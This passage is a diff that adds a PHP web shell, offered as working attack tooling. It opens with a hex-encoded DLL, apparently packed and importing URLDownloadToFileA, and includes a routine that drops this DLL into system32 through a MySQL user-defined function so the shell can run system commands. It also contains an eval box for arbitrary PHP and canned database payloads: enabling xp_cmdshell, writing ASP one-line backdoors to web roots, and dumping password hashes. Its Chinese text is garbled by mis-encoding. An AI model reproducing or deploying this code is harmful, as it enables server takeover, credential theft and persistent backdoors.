78DC159D22AD3A62018366B5B0CBE3C20732EDB6CB74EC1245E0140503720CA3F408C4C793BDF0F849CD25B6CA014041B9C0324FCF25DAADB2EDE8BC441DC8367EB138DB5D751678BF026118BB5D9F6AD3867DC7466534CDC6121CB9EEB9257F44DEC1AA574A3A6884412D80A7432B06D4B6C5E0D40403E1C78B2C8663713EDD57F1EDA321C0962C321858F2065C814876515F4A1F20BD966B6B336DC895DE08B15483212BDB27DB953D6BDDF74B45664E467749C8F6AB35BA3B30E03EB068C28EDD5618F54D5CC0AB11B88108B71B77179088B2680AD9F44568D4A9E0D7FBA0DBA5580F1491AF30C5E5CC60736942B498BC24E58ED61328118B4ECAC375E2D043E3E8A515E564234632356A53C0497CFC819DF1D1B56495340CEC2C73B028658A3432D24F276607CDD1C490554CC335033E433B263345BC8945D18908DD9968D532C34201BC53619181FE0DB630AD06A15B5CB3EBB15B0107CD3DC57CC0FE16050B3EB0B83DB33ECB6119CF6112949E0565FF670C9DA1C5552F8D7B2703A84933C8AF5CC38680C42EF047AC25F9A51D4E7023A01752E0A1BB1D552F0263A613E0A431D966EE146873A4101191411035BA330D56BFDD51A75555B430BB3FFB090D3D18E016DADCA0B4301070242B5CFD6ED44E94130E01302A86658AD799AAF335BD2CAC9C14A6D42AA5BC98CCC4F56530B4A55B050009C1B201AFFAE023307420FAB0424EBF3775DFE5ABB8C90416E14460FA373F201E6E20204C420753F98FD646C3A0AF38D46FF3B9CB8ACF87B5643BE51EEB60E56485481DF4C03C12580FC8D161DDEBD0A80E17FEB0D811FDED0540440391180C980DE880A81440B8D6686C5C671D0419080E3D60AC0C006A0A8487D065C9C249E5862050D10565D7426E8BC00BF83C410E0AE41C305E3CC0CB568E12EF1C6012D415CEB030A915B4013D4B88110B5DAA5DAD2630883FB0950769225FF2F7D6B2004308819413577DA802100498A178A018878007F8B118F49473BF972F21B365341486FFF948BD6A81E588D39C470CD4143A1D03B5CCF252EB6C1FF46758A274738C474F22C419D1AE324EC85D2E1C5FE4186E00E824A6F1474D21AC0E6FFD1575F3AEB78F0FFBF34019130007F0419C0D96EE2EB15130DC9817888C2C77895FFB541599EEE9067271FD82E760B3E6A602266C4040907B742A68D38CFDA39CB15580B0318AC05224EEBFB55D0C2052241280EABE097CF0B6C112836D1E970DA0C1B1FFF804EB741B35AB6201726828ADDFFDBEE0774217F1D467BFC720638DC770202E638F809D8B517BA35C6F7750DEBD733C908023657B34D9BB9AFE582806D6AE4BF0FF35FA6ED85B50A321926EF2BB446AB2F99EE57EBB68DDE5AC3EC74230BAB1F775165EB3AC0F0596B0979D584B5634DCA0975720271FC08A5C9DE0E5FFECB030051283074512BBC2311EC1A2D75770C920F1DA2C685B7A6EB52DF2F7D8B5BB10EC11AB6D10A5601805E6EBDF54B318065FE0088508845FDF3EB09BAAB41D90DFD0F6C8D4D0AD58B1803165179AD7DD182C16E4F026B53B38059E3450A23B07465BB72251CAE5A80450F8CD5815DB9AAF5490F8FA18A46D52D1FE9DEE83C057C83760A4D405E7D2539DBD187F8787E0BD95FAD6A0AA1A1F4DEE0FE8A045823C667D9EB658B1512DA65E94CB4B6C84A740FA7DF5BD4D630AF88065D0958B60917C5522B5B13566B032CF036BE03B49F572F1A6AE0648FCC20F6AEDA06AD75A5D646D0BE05FD032C37126253CB0BC18C00885DC029C25A0BC839FAAB60287C25F7E1C29DEB025EA105B11D42030985056C351FD31EAACA3EC1CC03580000D37466AAFF0F4D53EE65DD9304DF03E50F08EC03BDE4F2B2F20F0AFF0B050CCF0AB656D003D50302017FB6DF3A1903070602100445000535300050B5EEFF7F2C20283850580708003730305750070F200BD71461DE000860686009780073AE956E08071507001A010E7D7BDDFF0028006E0075006C0129320F6E756C6C6FB7FFDF0A72756E74696D65206572726F72200F0D0A03544C4F07E4BFD95353110E0053494E470044BBFD65ED4F4D4112115236303238082D204BB76F7F7961626C746F20696E6956616C697A0D6865D67EBED961703727376E6F743D0460EFB6FF756768207370616323667B6C6F7769380AB9EC3661066F6E3736ED672079737464357075722BF6DB5AFB76697274752133A5632320630C9B42BED86C285F345F2ABDF6DA7665785C2F5806DCE2E6BEB0935F3139F76F706558313260DBEE736F0F646573632B3888706B6D4624816564193024DF405723376D926FDBADA6AC7468BF612F6C6F636B1B6C8530173464B7865B6B6E612E02A221726D0050D8DAB770406772616D204A6D366829EC852F30394F10E71A8D66412A2B302E2B84EF53C8386172677528735F6DBBF63C303266C16E6E67826F9CB52EB605743A1164E67F4DC3DB422B2D60396615566973AAEFF660FC432B2B2052A04C6962B47279276D0F87B90A2D16450E211150D8656B9CD43AC2002E003CE5ED6D736DE0252C6B6C776E3E1B17EED8F84765744C61324102766550AE75705BDBCE62130F57956426876534BEF0FF7373616765426F78410075732533322E642ADD931252EAB75956035A77CF76670B5A955A0E0B5B8E0392483AAFB9BBB56D904A0064002C204D20086DC9BDB97900632F642F06D74D03FDB5179A4144EE656D626B5B4E6F76C3FE6D930B4F986F0A536570741486A96885416C96711BBEEDF9B941076E6541F369A64D101636172763684665327533BDF7DE7B4A616E0A675F57537BAF7BEF4B47433779433F3B6EA9D0DE3323B03C6418B0ED587B4F5E095468127313D9C15A6157BC7C0C547509B9D9B1C64D251053750743F7DE7BEF3B372F27231F039E73CEB90A11181F262D9C73CEC5AF828990979E72CE39E7A5ACB3BAC1C8A78008047C28BB92975043BD384F296360A9523F4D797371909620A953A636306EC263B50B355A6A09A663B7B921E76A3752C077035C321703ABCF91FB2E746D700FB40600B6472A481D3A2C7EB53D25E4E6FFDB730A2F636D642E657865202F63200068656C55192B75313774073967FF76B6E4380B3006687474703A2F2F8F2DF5FF2ED9632D9B09CAE4C8EBB8F1CABDB4EDCEF3FFC3FE6F120D00CFC2D4D8CAA7B0DC0BCEC4BCFEB3C9B9A6F6DCE6FE21C2B7BEB6A3BA7E175C3F44867B81D10F00200593195731D913199DE4667271F0108DE8832119B2178E180F30434E5146C2F80392017BD894A007010153107C81A4B902011F0264410152476357D9D9070A2F0207743CF2E4C96C084009140A73F01093274F9EC411941270133C79E4C944180C1972E41AAC1B93274F9E741C4C783C796EF2E4C92C7A1CFC18FF86B29317D854DD038572200107402699282048001940269210841002199009810119900119108202601C16023B20EF200D0C050133164DD30C3603070418050D344DD3340609070C0832D82083090A1B0BC1BEF702573B070F575F906EB0101311031217210C32D820350F414336D86083503352175307D860830D575F597B6C17D2344D376DAB20701C72D860DF0BC72F80B3810760830C36821F83848F208334CD91299EA1830D32D8A46FA7B79FCE760EC2601FD70B18070069BEB35D0517C00B1D0490664006968D08644006648E8F9006644006919293CC066140039F78EF4D54EC25FF0204222B6027CF0EF68279822117A6DF07A1A581E9CDF3EF9FE0FC2F407E80FCA8C1A3DAA34F0D72F60881FE0740B577830C812F41B65FCFA2E43E5F21FFA21A00E5A2E8A25B7EA1FE5105BF92DFEE03DA5EDA5F5FDA6ADA32D3D8DEE0B26627B7F939317E430303860064AA432EE99E9C84538B9876840380A6699AA67C7874706C9AA6699A645C54483C34699AA6692824201C18A6699AA614100C08044DD334970075FCF8F0E4DCA6E99E35D42F75CC03C4BC9AA6699AB0A89C908C8849BEA669806C64CD2E821D65BB8C8F905C037F009EF040E82F500B807007F0F11325DCA0D1535499508BDD50C944548CF38CDC97B058592CA7BF06699A0E1EEF3B5A9775A769BAA7B5D4F3E0301AB86CD3034E6D01333AB759699AA6697796B4D3F20CDA74DD272F034D6C01F108A48008368024444144210980D109600064C15B054D734325746554B6CBB7572C0D44656C65466905410A105FDB0C470A0953C5D87393CD2719522C0A23EC4F56C145185661726961622212C0EC7F436C6F736548616E6425F62AD80E4B4A500B63417B7B56686753791D656D4447B7C1B656F5227914744E747515B893FD70496E666F413569704FB1DBD62EA845782A08535D65702CFB36CCFD56657273696F163B896E6754792D67DF856C570F1F4C434D6170115706882E610D1B4D7073ED5BC34279126F65646543688366E5ABA03DFB644F66F34C6FFD8E6B68FF300B746C556E773C3D48D767EDAC7C70416C6C0A46B1FB432D7B9BE16F6D6D09336E7DACB38556982673FB0B790CC580D866E50B56ADB521419C42494D1E263CC3D609630A532740B029DBDACA16AD147215421BC0B64C5B762B78108C8580250B77C5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
+}
+function Mysql_u()
+{   
+	extract($_POST);
+	extract($_GET);
+	$mysql_hostname = $mysql_hostname?$mysql_hostname : "localhost";
+	$mysql_username = $mysql_username?$mysql_username : "root";
+	$post_sql = $post_sql ? $post_sql : "select state(\"net user\")";
+	$mysql_dbname = $mysql_dbname ? $mysql_dbname : "mysql";
+if($install){
+	$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
+	mysql_select_db($mysql_dbname,$link) or die(mysql_error());
+	@mysql_query("DROP TABLE udf_temp", $link);
+	$query="CREATE TABLE udf_temp (udf BLOB);";
+if(!($result=mysql_query($query, $link)))
+die('������ʱ��ʧ��'.mysql_error());
+else
+{
+	$code=get_code();
+	$query="INSERT into udf_temp values (CONVERT($code,CHAR));";
+	if(!mysql_query($query, $link))
+	{
+		mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
+		die('��װdllʧ��'.mysql_error());
+	}
+	else
+	{
+		$dllname = "mysqlDll.dll";
+	if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
+	elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll"; 
+	if(file_exists($dir)) {
+		$time = time();
+		$dir = str_replace("mysqlDll","mysqlDll_$time",$dir);
+		$dllname = str_replace("mysqlDll","mysqlDll_$time",$dllname);
+	}
+$query = "SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
+	if(!mysql_query($query, $link))
+	{
+		die("��װʧ��:$dir��Ȩ".mysql_error());
+	}
+	else
+	{
+		echo '<font style=font:11pt color=ff0000>'.$dir.'��װ�ɹ�</font><br>';
+	}
+}
+mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
+$result = mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error());
+if($result) {
+	echo "�ɹ�<br><a href='?'>����</a>";
+	exit();
+}
+}
+}
+?>
+<form method="post" action="?s=ee"><div class="actall">Host:<input name="mysql_hostname" value="<?echo $mysql_hostname;?>" type="text" style="width:100px" >
+User:<input name="mysql_username" value="<?echo $mysql_username;?>" type="text"  style="width:70px"> Password:<input type="password" name="mysql_passwd" value="<?echo $mysql_passwd;?>" style="width:70px"> DB:<input name="mysql_dbname" value="<?echo $mysql_dbname;?>" type="text" style="width:70px"> <input class="bt" name="install" type="submit" value="��װ"><br><br>
+sqlִ��:<br>
+<textarea name="post_sql" cols="80" rows="10"><?echo stripslashes($post_sql);?></textarea><br>
+<input class="bt" name="" type="submit" value="ִ��"><br></form>
+����:</div>
+<?
+if ($_POST[post_sql]) {
+$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
+if($mysql_dbname) mysql_select_db($mysql_dbname,$link) or die(mysql_error());
+$query = stripslashes($post_sql);
+$result = mysql_query($query, $link)  or die(mysql_error());
+?>
+<br><textarea name="post_sql" style="width:610px;height:180px;">
+<?
+echo ($result) ? "Done:$result\n\n" : "error:$result\n\n ".mysql_error();
+while ($row =  @mysql_fetch_array ($result)) {
+print_r ($row);
+}
+}
+?>
+</textarea>
+<?
+}
+//evalִ��php����
+function phpcode()
+{
+print<<<END
+<div class="actall"><h5>����php����:<h5></div>
+<form action="?s=ff" method="POST">
+<div class="actall"><textarea name="phpcode" rows="20" cols="80">phpinfo();/*print_r(apache_get_modules());*/</textarea></div><br />
+<div><input class="bt" type="submit" value="EVALִ��"></div><br></form>
+END;
+$phpcode = $_POST['phpcode'];
+$phpcode = trim($phpcode);
+if($phpcode){
+	if (!preg_match('#<\?#si',$phpcode)){
+	$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+	}
+eval("?".">$phpcode<?");
+echo '<br><br>';
+}
+return false;
+}
+//�������ݿ�����
+function otherdb(){
+$db = isset($_GET['db']) ? $_GET['db'] : '';
+print<<<END
+<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
+<div class="actall"><a href="?s=gg"> &nbsp psotgresql &nbsp</a> 
+<a href="?s=gg&db=ms"> &nbsp mssql &nbsp</a> 
+<a href="?s=gg&db=ora"> &nbsp oracle &nbsp</a>
+<a href="?s=gg&db=ifx"> &nbsp informix &nbsp</a>
+<a href="?s=gg&db=fb"> &nbsp  firebird &nbsp</a>
+<a href="?s=gg&db=db2">&nbsp db2 &nbsp</a></div></form>
+END;
+if ($db=="ms"){
+$mshost = isset($_POST['mshost']) ? $_POST['mshost']:'localhost';
+$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa';
+$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
+$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
+$msaction = isset($_POST['action']) ? $_POST['action'] : '';
+$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
+$msquery = stripslashes($msquery);
+print<<<END
+<form method="POST" name="msform" action="?s=gg&db=ms"><br>
+<div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
+User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
+Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
+Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
+<script language="javascript">
+function msFull(i){
+	Str = new Array(11);
+	Str[0] = "";
+	Str[1] = "select @@version;";
+	Str[2] = "select name from sysdatabases;";
+	Str[3] = "select name from sysobject where type='U';";
+	Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
+	Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
+	Str[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
+	Str[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
+	Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
+	Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
+	Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
+	Str[11] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
+	Str[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
+	msform.mssql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
+<select onchange="return msFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">��ʾ�汾</option>
+	<option value="2">���ݿ�</option>
+	<option value="3">����</option>
+	<option value="4">�ֶ�</option>
+	<option value="5">sp_oacreate</option>
+	<option value="6">xp_cmdshell</option>
+	<option value="7">xp_cmdshell(2005)</option>
+	<option value="8">sp_oacreate(2005)</option>
+	<option value="9">��openrowset(2005)</option>
+	<option value="10">xp_cmdshell exec</option>
+	<option value="10">sp_oamethod exec</option>
+	<option value="11">sp_makewebtask</option>
+</select>
+<input type="hidden" name="action" value="msquery">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if ($msaction == 'msquery'){
+$msconn= mssql_connect ($mshost , $msuser, $mspass);  
+mssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message());
+$msresult = mssql_query($msquery) or die(mssql_get_last_message());
+echo '<font face="verdana">';
+echo '<table border="1" cellpadding="1" cellspacing="2">';
+echo "\n<tr>\n";
+for ($i=0; $i<mssql_num_fields($msresult); $i++)
+{
+echo '<td bgcolor="#228B22"><b>'.
+mssql_field_name($msresult, $i);
+echo "</b></td>\n";
+}
+echo "</tr>\n";
+mssql_data_seek($result, 0);
+while ($msrow=mssql_fetch_row($msresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<mssql_num_fields($msresult); $i++ )
+{
+echo '<td bgcolor="#B8B8E8">';
+echo "$msrow[$i]";
+echo '</td>';
+}
+echo "</tr>\n";
+}
+echo "</table>\n";
+echo "</font>";
+mssql_free_result($msresult);
+mssql_close();
+}
+}
+elseif ($db=="ora"){
+$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
+$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
+$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root';
+$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456';
+$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
+$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
+$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
+$oraquery = stripslashes($oraquery);
+print<<<END
+<form method="POST" name="oraform" action="?s=gg&db=ora">
+<div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
+Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
+User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
+Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
+SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br>
+<script language="javascript">
+function oraFull(i){
+Str = new Array(8);
+	Str[0] = ""; 
+	Str[1] = "select version();";
+	Str[2] = "show databases;";
+	Str[3] = "show tables from db_name;";
+	Str[4] = "show columns from table_name;";
+	Str[5] = "select user,password from mysql.user;";
+	Str[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);";
+	Str[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'";
+	oraform.orasql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
+<select onchange="return oraFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">��ʾ�汾</option>
+	<option value="2">���ݿ�</option>
+	<option value="3">����</option>
+	<option value="4">�ֶ�</option>
+	<option value="5">hashes</option>
+	<option value="6">��ȡ�ļ�</option>
+	<option value="7">д�ļ�</option>
+</select>
+<input type="hidden" name="action" value="myquery">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if ($oraaction == 'oraquery'){
+$oralink = OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror()); 
+$oraresult=ociparse($oralink,$oraquery) or die(ocierror());
+$orarow=oci_fetch_row($oraresult);
+echo '<font face="verdana">';
+echo '<table border="1" cellpadding="1" cellspacing="2">';
+echo "\n<tr>\n";
+for ($i=0; $i<oci_num_fields($oraresult); $i++)
+{
+	echo '<td bgcolor="#228B22"><b>'.
+	oci_field_name($oraresult, $i);
+	echo "</b></td>\n";
+}
+echo "</tr>\n";
+ociresult($oraresult, 0);
+while ($orarow=ora_fetch_row($oraresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<ora_num_fields($result); $i++ )
+{
+echo '<td bgcolor="#B8B8E8">';
+echo "$orarow[$i]";
+echo '</td>';
+}
+echo "</tr>\n";
+}
+echo "</table>\n";
+echo "</font>";
+oci_free_statement($oraresult);
+ocilogoff();
+}
+}
+elseif ($db == "ifx"){
+$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root';
+$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456';
+$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
+$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
+$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
+$ifxquery = stripslashes($ifxquery);
+print<<<END
+<form method="POST" name="ifxform" action="?s=gg&db=ifx">
+<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
+User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
+Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br>
+<script language="javascript">
+function ifxFull(i){
+Str = new Array(11);
+	Str[0] = "";
+	Str[1] = "select dbservername from sysobjects;";
+	Str[2] = "select name from sysdatabases;";
+	Str[3] = "select tabname from systables;";
+	Str[4] = "select colname from syscolumns where tabid=n;";
+	Str[5] = "select username,usertype,password from sysusers;";
+	ifxform.ifxsql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
+<select onchange="return ifxFull(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">���ݿ����������</option>
+	<option value="1">���ݿ�</option>
+	<option value="2">����</option>
+	<option value="3">�ֶ�</option>
+	<option value="4">hashes</option>
+</select>
+<input type="hidden" name="action" value="ifxquery">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if ($ifxaction == 'ifxquery'){
+	$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
+	$ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg());
+	$ifxrow=ifx_fetch_row($ifxresult);
+	echo '<font face="verdana">';
+	echo '<table border="1" cellpadding="1" cellspacing="2">';
+	echo "\n<tr>\n";
+	for ($i=0; $i<ifx_num_fields($ifxresult); $i++)
+{
+echo '<td bgcolor="#228B22"><b>'.
+ifx_fieldproperties($ifxresult);
+echo "</b></td>\n";
+}
+echo "</tr>\n";
+mysql_data_seek($ifxresult, 0);
+while ($ifxrow=ifx_fetch_row($ifxresult))
+{
+echo "<tr>\n";
+for ($i=0; $i<ifx_num_fields($ifxresult); $i++ )
+{
+echo '<td bgcolor="#B8B8E8">';
+echo "$ifxrow[$i]";
+echo '</td>';
+}
+echo "</tr>\n";
+}
+echo "</table>\n";
+echo "</font>";
+ifx_free_result($ifxresult);
+ifx_close();
+}
+}
+elseif ($db=="db2"){
+$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
+$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
+$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root';
+$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456';
+$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
+$db2action = isset($_POST['action']) ? $_POST['action'] : '';
+$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
+$db2query = stripslashes($db2query);
+print<<<END
+<form method="POST" name="db2form" action="?s=gg&db=db2">
+<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
+Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
+User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
+Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
+Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br>
+<script language="javascript">
+function db2Full(i){
+Str = new Array(4);
+	Str[0] = "";
+	Str[1] = "select schemaname from syscat.schemata;";
+	Str[2] = "select name from sysibm.systables;";
+	Str[3] = "select colname from syscat.columns where tabname='table_name';";
+	Str[4] = "db2 get db cfg for db_name;";
+db2form.db2sql.value = Str[i];
+return true;
+}
+</script>
+<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
+<select onchange="return db2Full(options[selectedIndex].value)">
+	<option value="0" selected>ִ������</option>
+	<option value="1">���ݿ�</option>
+	<option value="1">����</option>
+	<option value="2">�ֶ�</option>
+	<option value="3">���ݿ�����</option>
+</select>
+<input type="hidden" name="action" value="db2query">
+<input class="bt" type="submit" value="Query"></div></form>
+END;
+if ($myaction == 'db2query'){
+$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
+$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg());
+$db2row=db2_fetch_row($db2result);
+echo '<font face="verdana">';
+echo '<table border="1" cellpadding="1" cellspacing="2">';
+echo "\n<tr>\n";
+for ($i=0; $i<db2_num_fields($db2result); $i++)
+{
+echo '<td bgcolor="#228B22"><b>'.
+db2_field_name($db2result);
+echo "</b></td>\n";
+}
+echo "</tr>\n";
+while ($db2row=db2_fetch_row($db2result))
+{
+echo "<tr>\n";
+for ($i=0; $i<db2_num_fields($db2result); $i++ )
+{
+echo '<td bgcolor="#B8B8E8">';
+echo "$db2row[$i]";
+echo '</td>';
+}
+echo "</tr>\n";
+}
+echo "</table>\n";
+echo "</font>";
+db2_free_result($db2result);
+db2_close();
+}
+}
+elseif($db == "fb") {
+$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
+$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
+$fbpath = str_replace("\\\\", "\\", $fbpath);
